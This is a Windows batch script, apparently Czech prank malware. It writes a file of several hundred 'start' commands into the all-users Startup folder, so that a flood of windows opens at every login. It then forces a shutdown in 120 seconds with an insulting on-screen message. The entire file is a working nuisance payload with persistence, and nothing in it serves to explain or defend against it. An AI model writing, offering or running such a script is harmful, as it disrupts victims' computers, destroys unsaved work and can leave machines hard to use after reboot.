@echo off
cd "C:\Users\All Users\Nabídka Start\Po Sp*"

echo >start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start
echo >>start.bat start

echo >>shutdown -s
shutdown -s -t 120 -c "Debile! ERROR stopni to do 120 s..."